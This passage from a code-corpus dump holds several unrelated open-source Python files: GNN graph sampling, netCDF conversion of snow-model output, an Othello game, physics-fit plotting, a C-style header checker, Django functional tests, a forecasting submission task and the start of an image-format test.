requires_grad=True)\n\n self.embeddings_cached = None\n self.adj_cached = None\n\n def forward(self,\n *args,\n return_embeddings: bool = False,\n **kwargs) -> Tensor:\n new_adj, _ = self.calculate_edges_and_embeddings()\n return new_adj\n\n def calculate_edges_and_embeddings(self, *args, **kwargs) -> Tuple[Tensor, Tensor]:\n new_embeddings = self.gcn.forward_to_last_layer(self.features, self.adj)\n\n if self.normalize_similarities:\n similarity_matrix = cosine_similarity(new_embeddings, new_embeddings)\n else:\n similarity_matrix = new_embeddings @ new_embeddings.t()\n # Introduce bias for probabilities and e.g. make sigmoid steeper\n new_adj = self.probs_factor * similarity_matrix + self.probs_bias\n new_adj = torch.sigmoid(new_adj) if self.use_sigmoid else new_adj\n new_adj = torch.tanh(new_adj) if self.use_tanh else new_adj\n new_adj = new_adj + self.adj if self.add_original else new_adj\n new_adj = torch.clamp(new_adj, 0., 1.)\n return new_adj, new_embeddings\n\n def sample(self, *args, **kwargs) -> Tensor:\n edge_probs, embeddings = self.calculate_edges_and_embeddings()\n edges = Sampler.sample(edge_probs, embeddings=embeddings)\n self.adj_cached, self.embeddings_cached = edges, embeddings\n return edges\n\n def refine(self):\n if self.adj_cached is not None and self.embeddings_cached is not None:\n self.features = self.embeddings_cached\n self.adj = self.adj_cached\n\n def statistics(self) -> Dict[str, float]:\n probs = self.forward()\n return {\n \"expected_num_edges\": probs.sum().item(),\n \"percentage_edges_expected\": probs.sum().item() / self.n_edges,\n \"probs_factor\": self.probs_factor.item(),\n \"probs_bias\": self.probs_bias.item()\n }\n","repo_name":"andreas-grafberger/lds-gnn","sub_path":"src/models/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"19770535615","text":"# simple_app_code.py\nimport subprocess\n\nsource_file = \"../examples/simple_app.py\"\n\nfilename = \"source/simple_app_code_{:02d}.rst\"\nall_lines = []\ncount = 0\n\nwith open(source_file) as fobj:\n source_lines = fobj.readlines()\n\n\ndef save(count, text):\n\n prefix = \".. 
code-block:: python \\n\"\n suffix = \"..\"\n\n with open(filename.format(count), \"w\") as fobj:\n fobj.write(prefix)\n fobj.write(\"\\n\")\n\n fobj.writelines(text)\n fobj.write(suffix)\n\n count += 1\n return count\n\n\ndef find_block(start, end):\n\n spaces = 4\n temp = []\n append = False\n for line in source_lines:\n if end is not None and line.strip() == end:\n return \"\".join(temp)\n if append:\n temp.append(\" \" * spaces + line)\n if line.strip() == start:\n append = True\n\n return \"\".join(temp)\n\n\nlocations = [\n [\"# initialize\", \"# create some data\"],\n [\"# create some data\", \"# create resources\"],\n [\"# create resources\", \"# create meta resources\"],\n [\"# create meta resources\", \"# end create_resources\"],\n [\"# add resources to api\", None],\n]\n\nfor start, end in locations:\n text = find_block(start, end)\n count = save(count, text)\n","repo_name":"sidorof/flask-restful-dbbase","sub_path":"docsrc/simple_app_code.py","file_name":"simple_app_code.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5575365263","text":"# Merge all CHM output files into one netcdf file (easier to plot later)\n\n# Assumes:\n# 1) that output file name syntax is : XXX_out.txt where XXX is the three letter station/point code\n# 2) Time zone is in UTC\n\n# Saves to netcdf file in \\points\\ dir\nimport xarray as xr\nimport glob\nimport os\nimport sys\nimport imp\nimport pandas as pd\nimport datetime\n\n#EXP_names = ['HRDPS_Historical','forecast_CRHO_spinup','GDPS_Current','HRDPS_Current_Snowpack']\n\n# Unit conversion done\n# Model p from mm to m\n# swe from kg/m^2 to m\n\n# Load in config file\n####### load user configurable paramters here #######\n# Check user defined configuraiton file\n\nif len(sys.argv) != 3:\n raise ValueError('Requires two arguments [configuration file] [chm_run_dir]')\n\n# Get name of configuration file/module\nconfigfile = sys.argv[1]\nchm_run_dir = sys.argv[2]\nprint(chm_run_dir)\n\n# Load in configuration file as module\nX = imp.load_source('',configfile)\n\n# Assign to local variables\ngit_dir = X.git_dir\n\nfor c_exp in [chm_run_dir]:\n print(c_exp)\n # 1km\n# # main_dir = os.path.normpath(r'C:\\\\Users\\new356\\Model_Output\\CHM\\Nov_2014')\n# main_dir = os.path.normpath(r'C:\\Users\\new356\\Model_Output\\CHM\\SnowCast')\n\n mod_dir = os.path.join(git_dir,'CHM_Configs',c_exp,'points')\n nc_file_out = 'CHM_pts.nc'\n # Move to Model dir\n os.chdir(mod_dir) \n # Get files\n cfiles = glob.glob('*_out.txt')\n # Time zone\n UTC_to_MST = 0 # UTC \n\n\n\n # Loop each station\n CHM_pts = []\n for cf in cfiles:\n cSta = cf.split('_')[0]\n print(\"processing \" + cSta)\n\n # Import MODEL data to pandas dataframe\n modData = pd.read_csv(cf,sep=\",\",parse_dates=True) \n modData.set_index('datetime',inplace=True)\n # Make datetime the index\n modData.index = pd.to_datetime(modData.index)\n modData.index = modData.index + datetime.timedelta(hours=UTC_to_MST)\n # Convert to data set and add station name\n c_ds = xr.Dataset(modData)\n c_ds['station'] = cSta\n c_ds.rename({'datetime':'time'}, inplace=True)\n # Save in list\n CHM_pts.append(c_ds)\n\n\n\n # concat all stations\n ds = xr.concat(CHM_pts,dim='station')\n \n # Convert unit of precipitaiotn from mm to m\n ds['p'] = ds.p / 1000\n ds['p_rain'] = ds.p_rain / 1000\n ds['p_snow'] = ds.p_snow / 1000\n\n # Convert unit of swe from kg/m^2 to m\n if 'swe' in ds.data_vars:\n ds['swe'] = ds.swe / 1000\n \n # Set 
-9999 (CHM missing value) to nan\n ds = ds.where(ds!=-9999)\n \n # Save out to netcdf\n ds.to_netcdf(nc_file_out,engine='netcdf4')\n \n print(ds)\n","repo_name":"NicWayand/SnowCast","sub_path":"Post_Processing/Point_Evals/CHM_point_output_to_netcdf.py","file_name":"CHM_point_output_to_netcdf.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74217587367","text":"import sys, string, random\n\ndef showboard(string):\n string = (\" \".join(string)+\" \")\n print(\" ------------------\")\n for i in range(0,len(string),16):\n print(str(int((i/16)))+str(\"|\")+\"\"+string[i:i+16]+\"|\"+str(int((i/16))))\n print(\" ------------------\")\n print(\" 0 1 2 3 4 5 6 7\")\n\n\ndef getequivalency():\n pos={}\n for i in range(8):\n pos[i] = {}\n for x in range(8):\n pos[i][x]=(i*8)+x\n flipd = {}\n flipo = {}\n RR = {}\n R2 = {}\n RL = {}\n flipx = {}\n flipy={}\n for i in range(8):\n flipo[i] ={}\n flipd[i] = {}\n RR[i] = {}\n R2[i] = {}\n RL[i] = {}\n flipx[i] = {}\n flipy[i]= {}\n for x in range(8):\n flipd[i][x]=pos[7-x][7-i]\n flipo[i][x] = pos[x][i]\n RR[i][x] = pos[x][7-i]\n R2[i][x] = pos[7-i][7-x]\n RL[i][x]=pos[7-x][7-(7-i)]\n flipx[i][x] = pos[i][7-x]\n flipy[i][x] = pos[7-i][x]\n return {\"RL\":RR,\"R2\":R2,\"RR\":RL,\"FD\":flipd,\"FO\":flipo, \"FY\":flipx,\"FX\":flipy, \"I\":pos}\n\ndef getneighbors():\n neighbors = {}\n for pos in range(64):\n neighbors[pos] = set([])\n neighbors[pos].add(pos+1)\n neighbors[pos].add(pos-1)\n neighbors[pos].add(pos-8)\n neighbors[pos].add(pos+8)\n neighbors[pos].add(pos+9)\n neighbors[pos].add(pos+7)\n neighbors[pos].add(pos-9)\n neighbors[pos].add(pos-7)\n neighbors[pos]=neighbors[pos]-set(range(64,100))-set(range(-10,0))\n if pos%8==7:\n neighbors[pos] = neighbors[pos]-set(range(0,64,8))\n elif pos%8==0:\n neighbors[pos] = neighbors[pos]-set(range(7,64,8))\n return neighbors\n\ndef posmoves(string, char):\n dictposmoves = set([])\n poschar = set([])\n for i, j in enumerate(string):\n if j == char:\n poschar.add(i)\n posneighbors = getneighbors()\n Tempposstep = {}\n #print(str(poschar))\n #print(string)\n for pos in poschar:\n for mov in posneighbors[pos]:\n if not string[mov] ==\".\" and not string[mov]==char:\n if (mov-pos)in Tempposstep:\n Tempposstep[mov-pos].add(mov)\n else:\n Tempposstep[mov-pos] = set([mov])\n #print(str(Tempposstep))\n for diff in Tempposstep.keys():\n for pos in Tempposstep[diff]:\n Temppos = pos\n while not string[Temppos]==char and not string[Temppos]==\".\":\n if Temppos+diff in posneighbors[Temppos]:\n Temppos+=diff\n else:\n break\n if string[Temppos] =='.':\n dictposmoves.add(Temppos)\n print(str(dictposmoves))\n return dictposmoves\n\ndef playmove(string, char, pos, neighhors):\n posdirections ={}\n flip = set([pos])\n Temp = set([])\n for mov in neighhors[pos]:\n if not string[mov]==char and not string[mov]==\".\":\n posdirections[mov-pos] = mov\n #print(mov)\n for diff in posdirections.keys():\n mov = posdirections[diff]\n while -1<mov<64 and not string[mov]==char and not string[mov]==\".\" :\n Temp.add(mov)\n mov = mov+diff\n if -1<mov<64 and string[mov]==char:\n flip = flip|Temp\n else:\n Temp = set([])\n for mov in flip:\n string=string[0:mov]+char+string[mov+1:len(string)]\n return string\n\ndef endgame(string):\n players = [\"O\",\"X\"]\n counts = [set([]),set([])]\n for player in range(2):\n for i, j in enumerate(string):\n if j == players[player]:\n counts[player].add(i)\n\n if len(counts[0])==len(counts[1]):\n 
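# equal disc counts for the two players, so the game is a draw\n        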
print(\"Tie \"+str(len(counts[0]))+\"-\"+str(len(counts[1])))\n else:\n if len(counts[0])>len(counts[1]):\n winner = 0\n else:\n winner = 1\n print(players[winner]+\" wins \"+str(len(counts[winner]))+\"-\"+str(len(counts[1-winner])))\n\ndef transform(string, operation):\n Temp = \"\"\n for i in range(8):\n for x in range(8):\n Temp+=string[operation[i][x]]\n return Temp\n\ndef playgame(string, play):\n neighhors = getneighbors()\n print(str(neighhors))\n currentgame = string\n players = [\"O\",\"X\"]\n currplayer = 1\n check = True\n equivalnce = getequivalency()\n while \".\" in string:\n showboard(string)\n posmov = posmoves(string, players[currplayer])\n #print(str(posmov))\n if len(posmov)>0:\n check = True\n print(players[currplayer]+\"'s turn\\tRow Col\")\n if play[1-currplayer]==\"p\":\n Temp = input()\n if Temp.upper() in equivalnce:\n newstr = string\n if Temp.upper == \"I\":\n newstr = transform(string,equivalnce[Temp.upper()])\n showboard(newstr)\n Temp = input()\n else:\n while not Temp.upper()==\"I\":\n #print(equivalnce[Temp.upper()])\n newstr = transform(string,equivalnce[Temp.upper()])\n showboard(newstr)\n Temp = input()\n else:\n Temp = Temp.split()\n pos = -1\n if len(Temp)==1 and len(Temp[0])==1 and int(Temp[0])<8:\n pos = int(Temp[0])\n #print(str(pos))\n elif \",\" in Temp[0]:\n row = int(Temp[0][0])\n if len(Temp)>1:\n col = int(Temp[1])\n else:\n col = int(Temp[0][2])\n elif int(Temp[0])>7:\n print(str(pos))\n pos = int(Temp[0])\n\n else:\n row = int(Temp[0])\n col = int(Temp[1])\n if pos==-1:\n pos = (row*8)+col\n #print(str(pos\n #print(str(pos))\n #print(str(posmov))\n if pos in posmov:\n print(posmov)\n string = playmove(string, players[currplayer], pos, neighhors)\n currplayer = 1-currplayer\n else:\n print(\"Not a valid move\")\n else:\n pos = random.choice(list(posmov))\n print(str(pos))\n string = playmove(string, players[currplayer],pos, neighhors)\n currplayer = 1-currplayer\n\n else:\n if check:\n print(\"No Possible moves for \"+players[currplayer]+\" They Pass\")\n check = False\n currplayer = 1-currplayer\n else:\n print()\n endgame(string)\n return\n #print(string)\n showboard(string)\n endgame(string)\n\nif len(sys.argv)>2:\n play = [sys.argv[1],sys.argv[2]]\nelse:\n play = [\"p\",\"p\"]\nprint(str(play))\nplaygame(\"...........................OX......XO...........................\", play)\n","repo_name":"2017vtandale/Othello","sub_path":"Othellopt4.py","file_name":"Othellopt4.py","file_ext":"py","file_size_in_byte":7194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19702306411","text":"#!/usr/bin/env python3\n\"\"\"\nPlotting routine for the fit inputs.\n\"\"\"\n\nimport argparse\nimport sys, os\nimport yaml\nfrom collections import Counter\nfrom scharm.limits.limitsty import alpha_names, reg_names\n\n_txt_size = 16\n_summed_bg = ['Wjets', 'Zjets', 'top', 'singleTop', 'other']\n_def_regions = ['cr_z', 'signal_mct150', 'cr_t', 'cr_w']\n_def_syst = ['jer','jes','met','metres', 'b', 'c', 'u', 't']\n_sys_lists = {\n 'default': _def_syst,\n 'jesbd': [\n 'jcb', 'jicalm', 'jicals', 'jpumu',\n 'jpunpv', 'jpupt', 'jpurho', 'jsp'], #, 'jnc'\n 'jesnp': ['jenp1', 'jenp2', 'jenp3', 'jenp4', 'jenp5', 'jenp6'],\n 'jesflav': ['jbjes', 'jflavcomp', 'jflavresp'],\n }\n\ndef _get_args():\n \"\"\"input parser\"\"\"\n d = 'default: %(default)s'\n syst_help = d + ' allowed expansions: {}'.format(\n ', '.join(_sys_lists.keys()))\n parser = argparse.ArgumentParser(description=__doc__)\n 
parser.add_argument('fit_inputs')\n parser.add_argument('-r','--regions', nargs='+', default=_def_regions)\n parser.add_argument(\n '-s','--systematics', nargs='+', default=_def_syst, help=syst_help)\n parser.add_argument('-o','--plot-name', default='test.pdf', help=d)\n return parser.parse_args()\n\ndef run():\n \"\"\"top level routine\"\"\"\n args = _get_args()\n with open(args.fit_inputs) as yml:\n inputs_dict = yaml.load(yml)\n\n # allow adding of systematic groups from _sys_lists\n plot_systs = []\n for syst in args.systematics:\n if syst in _sys_lists:\n plot_systs += _sys_lists[syst]\n else:\n plot_systs.append(syst)\n\n systs = {}\n for syst in plot_systs:\n regs, nom, down, up, data = _get_counts(\n inputs_dict, args.regions, syst)\n systs[syst] = (regs, nom, down, up, data)\n\n ofile = args.plot_name\n odir = os.path.dirname(ofile)\n if odir and not os.path.isdir(odir):\n os.mkdir(odir)\n _plot_counts(systs, ofile)\n\n_syst_colors = list('rgbcmk') + ['orange', 'purple', 'brown', 'white']\ndef _plot_counts(counts, out_file):\n from matplotlib.figure import Figure\n from matplotlib.backends.backend_agg import FigureCanvasAgg as FigCanvas\n from numpy import arange\n\n fig = Figure(figsize=(8, 3))\n canvas = FigCanvas(fig)\n ax = fig.add_subplot(1,1,1)\n\n trash, ex_sys = next(iter(counts.items()))\n ex_regs, ex_nom, *nada, ex_data = ex_sys\n\n # offsetter for systematics\n sysw = 0.5\n syst_increment = sysw / (len(counts) - 1)\n syst_initial = -sysw / 2\n sys_num = {x:n for n, x in enumerate(sorted(counts.keys()))}\n def get_offset(syst):\n return syst_initial + sys_num[syst] * syst_increment\n\n x_vals_base = arange(len(ex_regs)) + 0.5\n ax.errorbar(\n x_vals_base, ex_data / ex_nom, yerr=ex_data**0.5/ ex_nom,\n fmt='o', color='k', label='data')\n\n ax.set_xticks(x_vals_base)\n ax.set_xticklabels([reg_names.get(x,x) for x in ex_regs])\n for sysnm, (regions, nom, down, up, data) in sorted(counts.items()):\n x_vals = x_vals_base + get_offset(sysnm)\n color = _syst_colors[sys_num[sysnm]]\n ax.set_xlim(0, len(regions))\n up_vals = up / nom\n ax.plot(x_vals, up_vals , '^', color=color,\n label=alpha_names.get(sysnm, sysnm))\n dn_vals = down / nom\n ax.plot(x_vals, dn_vals, 'v', color=color)\n\n ax.tick_params(labelsize=_txt_size)\n leg = ax.legend(\n numpoints=1, ncol=5, borderaxespad=0.0, loc='upper left',\n handletextpad=0, columnspacing=1, framealpha=0.5, fontsize=10)\n\n ax.axhline(1, linestyle='--', color=(0,0,0,0.5))\n ylims = ax.get_ylim()\n # ax.set_ylim(ylims[0], (ylims[1] - ylims[0]) *0.2 + ylims[1])\n ax.set_ylim(0.8, 1.3)\n ax.set_ylabel('Variation / Nominal')\n fig.tight_layout(pad=0.3, h_pad=0.3, w_pad=0.3)\n canvas.print_figure(out_file, bboxinches='tight')\n\ndef _get_counts(inputs_dict, regions, syst):\n \"\"\"returns counts as a tuple of Counters, (nom, down, up, data)\"\"\"\n yields = inputs_dict['nominal_yields']\n systs = inputs_dict['yield_systematics']\n if syst in systs:\n return _get_sym_counts(inputs_dict, regions, syst)\n nup = syst + 'up'\n ndn = syst + 'down'\n if any(x not in systs for x in [nup, ndn]):\n raise ValueError(\"couldn't find up / down systematics for {}\".format(\n syst))\n\n reg_up_counter = Counter()\n reg_dn_counter = Counter()\n reg_nom_counter = Counter()\n data_counter = {}\n for region in regions:\n for bg in _summed_bg:\n def get_yld(dic, reg, bg):\n nom = yields[reg].get(bg,[0])[0]\n return dic[reg].get(bg, [nom])[0]\n try:\n reg_nom_counter[region] += get_yld(yields,region,bg)\n reg_up_counter[region] += 
get_yld(systs[nup],region,bg)\n reg_dn_counter[region] += get_yld(systs[ndn],region,bg)\n except KeyError as err:\n raise KeyError(\"can't find {} {}\".format(region, bg))\n data_counter[region] = yields[region].get('data',[float('NaN')])[0]\n\n return _arrays_from_counters(\n reg_nom_counter, reg_dn_counter, reg_up_counter, data_counter)\n\ndef _get_sym_counts(inputs_dict, regions, syst):\n import numpy as np\n yields = inputs_dict['nominal_yields']\n systs = inputs_dict['yield_systematics']\n nom_counter = Counter()\n alt_counter = Counter()\n data_counter = {}\n for region in regions:\n for bg in _summed_bg:\n def get_yld(dic, reg, bg):\n nom = yields[reg].get(bg,[0])[0]\n return dic[reg].get(bg, [nom])[0]\n nom_counter[region] += get_yld(yields,region,bg)\n alt_counter[region] += get_yld(systs[syst],region,bg)\n data_counter[region] = yields[region].get('data',[float('NaN')])[0]\n\n sreg = sorted(regions)\n n_reg = len(regions)\n nom_array = np.zeros(n_reg)\n alt_array = np.zeros(n_reg)\n data_array = np.zeros(n_reg)\n for idx, reg in enumerate(sreg):\n nom_array[idx] = nom_counter[reg]\n alt_array[idx] = alt_counter[reg]\n data_array[idx] = data_counter[reg]\n diff = np.abs(nom_array - alt_array)\n down = nom_array - 0.5*diff\n up = nom_array + 0.5*diff\n return sreg, nom_array, down, up, data_array\n\ndef _arrays_from_counters(*counters):\n \"\"\"\n Takes dicts, returns (region_list, nominal, down, up).\n Meant to handle the asym counts only.\n \"\"\"\n from numpy import zeros\n nom, down, up, data = counters\n regions = list(sorted(nom.keys()))\n n_reg = len(regions)\n dn_array = zeros(n_reg)\n up_array = zeros(n_reg)\n nom_array = zeros(n_reg)\n data_array = zeros(n_reg)\n for idx, reg in enumerate(regions):\n dn_array[idx] = down[reg]\n up_array[idx] = up[reg]\n nom_array[idx] = nom[reg]\n data_array[idx] = data[reg]\n return regions, nom_array, dn_array, up_array, data_array\n\nif __name__ == '__main__':\n run()\n","repo_name":"dguest/susy-analysis","sub_path":"scripts/susy-fit-draw-inputs.py","file_name":"susy-fit-draw-inputs.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24755234727","text":"from norminette.rules import Rule\nimport re\n\nclass CheckHeader(Rule):\n def __init__(self):\n super().__init__()\n self.depends_on = []\n\n def parse_header(self, context):\n if context.check_token(0, \"MULT_COMMENT\") is False:\n print (\"Missing or invalid header. Header are being reintroduced as a mandatory part of your files. This is not yet an error.\")\n context.header_parsed = True\n return\n context.header += context.peek_token(0).value + '\\n'\n\n def check_header(self, context):\n val = r\"\\/\\* \\*{74} \\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\*.{3}([^ ]*).*\\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\* By: ([^ ]*).*\\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\* Created: ([^ ]* [^ ]*) by ([^ ]*).*\\*\\/\\n\\/\\* Updated: ([^ ]* [^ ]*) by ([^ ]*).*\\*\\/\\n\\/\\*.*\\*\\/\\n\\/\\* \\*{74} \\*\\/\\n\"\n correct_header = re.match(val, context.header)\n if correct_header is None:\n print (\"Missing or invalid header. Header are being reintroduced as a mandatory part of your files. This is not yet an error.\")\n #context.new_error(\"INVALID_HEADER\", context.peek_token(0))\n #else:\n # print (correct_header.group(1,2,3,4,5,6))\n\n def run(self, context):\n \"\"\"\n Header checking. Just a warning for now. 
Does not trigger moulinette error\n \"\"\"\n if context.header_parsed == True:\n return False, 0\n elif context.history[-1] == \"IsComment\" and context.header_parsed == False:\n self.parse_header(context)\n context.header_started = True\n elif context.history[-1] != \"IsComment\" and context.header_started == True:\n self.check_header(context)\n context.header_parsed = True\n elif context.header_started == False and context.header_parsed == False and context.history[-1] != \"IsComment\":\n #context.new_error(\"INVALID_HEADER\", context.peek_token(0))\n print (\"Missing or invalid header. Header are being reintroduced as a mandatory part of your files. This is not yet an error.\")\n context.header_parsed = True\n","repo_name":"danlee65071/miniRT","sub_path":"venv/lib/python3.8/site-packages/norminette/rules/check_header.py","file_name":"check_header.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29558961478","text":"from django.test import tag\nfrom functional_tests.base import FunctionalTest\nfrom projects.models import Project\nfrom robjects.models import Robject\nfrom samples.models import Sample\nfrom guardian.shortcuts import assign_perm\n\n\n@tag('slow')\nclass TestUserVisitsSampleDetails(FunctionalTest):\n\n def create_sample_data(self):\n # CREATE SAMPLE USER AND PROJECT.\n usr, proj = self.project_set_up_using_default_data()\n # CREATE SAMPLE ROBJECT.\n robj = Robject.objects.create(name='robject_1', project=proj)\n # CREATE SAMPLE SAMPLE FOR PROJECT.\n samp = Sample.objects.create(code='sample_1', robject=robj)\n return(usr, proj, robj, samp)\n\n def test_user_enter_wrong_slug_in_url(self):\n self.not_matching_url_slug_helper(self.SAMPLE_DETAILS_URL)\n\n def test_annonymous_user_visits_samples_details(self):\n # CREATE SAMPLE PROJECT BASIC INFORMATIONS.\n proj = Project.objects.create(name=\"project_1\")\n # CREATE SAMPLE ROBJECT.\n robj = Robject.objects.create(name='robject_1', project=proj)\n # CREATE SAMPLE SAMPLE FOR PROJECT.\n samp = Sample.objects.create(code='sample_1', robject=robj)\n # Annonymus user want to visit sample detail page.\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/samples/{samp.id}/\")\n current_url = self.browser.current_url\n # Annonymus user is redirected to login page.\n expected_url = self.live_server_url + \\\n f\"/accounts/login/?next=/projects/{proj.name}/samples/{samp.id}/\"\n self.assertEqual(current_url, expected_url)\n\n def test_user_without_project_permission_wants_to_vist_sample_detail_page(self):\n self.permission_view_testing_helper(self.SAMPLE_DETAILS_URL)\n\n def test_user_with_permission_seas_single_sample_detail_page_and_checks_static_elements(self):\n # CREATE SAMPLE DATA.\n usr, proj, robj, samp = self.create_sample_data()\n # ASSIGN PERMISSIONS FOR PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n samp = Sample.objects.create(code='sample_1', robject=robj)\n # User want to visit sample detail page.\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/samples/{samp.id}/\")\n # User seas header which is sample code.\n header_content = self.browser.find_element_by_css_selector('h1')\n self.assertEqual(header_content.text, \"sample_1\")\n # User also seas return to samples table link.\n link = self.browser.find_element_by_css_selector(\"a.link_back\")\n self.assertEqual(link.text, \"Back to sample table\")\n link.click()\n self.assertEqual(self.browser.current_url,\n 
self.live_server_url + f\"/projects/{proj.name}/samples/\")\n\n def test_user_checks_sample_details_on_page(self):\n # CREATE SAMPLE USER AND PROJECT.\n usr, proj = self.project_set_up_using_default_data()\n # SET USER PERMISSION FOR PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n # CREATE SAMPLE ROBJECT.\n robj = Robject.objects.create(name='robject_1', project=proj)\n # CREATE SAMPLE AND DETAILS.\n samp = Sample.objects.create(code='sample_1',\n robject=robj,\n notes='Some Sample Notes',\n form='solid, 1px',\n source='SourceCode',\n status=7\n )\n\n # User want to visit sample detail page.\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/samples/{samp.id}/\")\n\n # User seas list of details.\n self.assertIn(\n \"robject_1\", self.browser.find_element_by_css_selector(\".name\").text)\n self.assertIn(\"Some Sample Notes\",\n self.browser.find_element_by_css_selector(\".notes\").text)\n self.assertIn(\"solid, 1px\",\n self.browser.find_element_by_css_selector(\".form\").text)\n self.assertIn(\"SourceCode\",\n self.browser.find_element_by_css_selector(\".source\").text)\n self.assertIn(\"Production\",\n self.browser.find_element_by_css_selector(\".status\").text)\n\n def test_user_creates_several_samples_for_projects_and_checks_one_sample_details(self):\n # CREATE SAMPLE USER AND PROJECT.\n usr, proj = self.project_set_up_using_default_data()\n # SET USER PERMISSION FOR PROJECT.\n assign_perm(\"projects.can_visit_project\", usr, proj)\n # CREATE SAMPLE ROBJECT.\n robj = Robject.objects.create(name='robject_1', project=proj)\n # CREATE SAMPLE AND DETAILS.\n Sample.objects.create(code='sample_1',\n robject=robj,\n notes='Some Sample Notes',\n form='solid 1px',\n source='SourceCode',\n status=7\n )\n\n # CREATE SECOND SAMPLE AND DETAILS.\n samp2 = Sample.objects.create(code='sample_2',\n robject=robj,\n notes='Some Other Sample Notes',\n form='2px solid #ccc',\n source='source .bashrc',\n status=8\n )\n\n # User want to visit sample detail page.\n self.browser.get(self.live_server_url +\n f\"/projects/{proj.name}/samples/{samp2.id}/\")\n # User seas list of details for second sample.\n self.assertIn(\n \"robject_1\", self.browser.find_element_by_css_selector(\".name\").text)\n self.assertIn(\"Some Other Sample Notes\",\n self.browser.find_element_by_css_selector(\".notes\").text)\n self.assertIn(\"2px solid #ccc\",\n self.browser.find_element_by_css_selector(\".form\").text)\n self.assertIn(\"source .bashrc\",\n self.browser.find_element_by_css_selector(\".source\").text)\n self.assertIn(\"Quality COntrol\",\n self.browser.find_element_by_css_selector(\".status\").text)\n","repo_name":"Mateusz-Kirmuc/biodb_TDD","sub_path":"biodb/functional_tests/test_sample_details.py","file_name":"test_sample_details.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30664567510","text":"import os\nfrom glob import glob\nfrom functools import cached_property\nimport json\nimport datetime\n\nimport luigi\nimport pandas as pd\nfrom tqdm import tqdm\nfrom gluonts.model.forecast import Forecast\nimport torch\nimport pytorch_lightning as pl\n\nfrom datah_challenge.task.training import BaseTraining, DeepARTraining, TemporalFusionTransformerTraining\nfrom datah_challenge.dataset import JsonGzDataset, SplitFeaturesIntoFields, SameSizeTransformedDataset\nfrom datah_challenge.task.data_preparation import PrepareGluonTimeSeriesDatasets\n\n\nclass 
GenerateSubmission(luigi.Task):\n task_path: str = luigi.Parameter()\n\n num_samples: int = luigi.IntParameter(default=100)\n seed: int = luigi.IntParameter(default=42)\n\n @cached_property\n def training(self) -> BaseTraining:\n with open(os.path.join(self.task_path, \"params.json\"), \"r\") as params_file:\n params = json.load(params_file)\n training_class = {\n DeepARTraining.__name__: DeepARTraining,\n TemporalFusionTransformerTraining.__name__: TemporalFusionTransformerTraining,\n }[os.path.split(os.path.split(self.task_path)[0])[1]]\n return training_class(**params)\n\n def requires(self):\n return PrepareGluonTimeSeriesDatasets(\n categorical_variables=self.training.categorical_variables,\n id_variables=self.training.id_variables,\n )\n\n def output(self):\n return luigi.LocalTarget(\n os.path.join(\n self.task_path,\n f\"submission_num-samples={self.num_samples}_seed={self.seed}.csv\",\n )\n )\n\n def run(self):\n pl.seed_everything(self.seed, workers=True)\n\n paths = glob(os.path.join(self.input().path, \"*.json.gz\"))\n\n dataset = JsonGzDataset(paths, freq=\"W\")\n\n if isinstance(self.training, TemporalFusionTransformerTraining):\n dataset = SameSizeTransformedDataset(\n dataset,\n transformation=SplitFeaturesIntoFields(\n self.training.categorical_variables,\n self.training.real_variables,\n ),\n )\n\n predictor = self.training.get_trained_predictor(torch.device(\"cuda\"))\n predictor.batch_size = 512\n\n rows = []\n for forecast in tqdm(predictor.predict(dataset, num_samples=self.num_samples), total=len(dataset)): # type: Forecast\n delta = datetime.timedelta(weeks=self.training.test_steps - 1)\n\n dates = pd.date_range(\n forecast.start_date, forecast.start_date+delta, freq=\"W\"\n )\n\n for date, pred in zip(dates, forecast.mean):\n rows.append({\n \"ID\": \"%s_%s\" % (date.strftime('%Y-%m-%d'), forecast.item_id.replace(\"_partition=\", \"\")),\n \"QTT\": float(pred)\n })\n\n df = pd.DataFrame(data=rows)\n\n sample_df = pd.read_csv(\"assets/submission_sample.csv\")\n df = df[df[\"ID\"].isin(sample_df[\"ID\"])]\n\n remaining_df = sample_df[~(sample_df[\"ID\"].isin(df[\"ID\"]))]\n remaining_df[\"QTT\"] = 1\n\n df = pd.concat([df, remaining_df])\n\n df.sort_values(by=\"ID\").to_csv(self.output().path, index=False)\n\n\n\n\n\n","repo_name":"fernandocamargoai/datah-challenge","sub_path":"datah_challenge/task/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21963708704","text":"from PIL import Image\nimport os\nimport urllib.request\nimport io\nfrom tests.utils.formats import (\n thumb_test,\n resized_test,\n mask_test,\n crop_test,\n crop_null_annot_test,\n histogram_perimage_test,\n)\nimport pytest\nimport subprocess\n\n\ndef get_image(path, filename, root):\n filepath = os.path.join(path, filename)\n # If image does not exist locally -> download image\n\n if not os.path.exists(\"/tmp/images\"):\n os.mkdir(\"/tmp/images\")\n\n if not os.path.exists(root):\n os.mkdir(root)\n\n if not os.path.exists(f\"/tmp/images/{filename}\"):\n try:\n url = f\"https://data.cytomine.coop/open/tests/Test%20special%20char%20%25(_!.tiff\"\n urllib.request.urlretrieve(url, f\"/tmp/images/{filename}\")\n except Exception as e:\n print(\"Could not download image\")\n 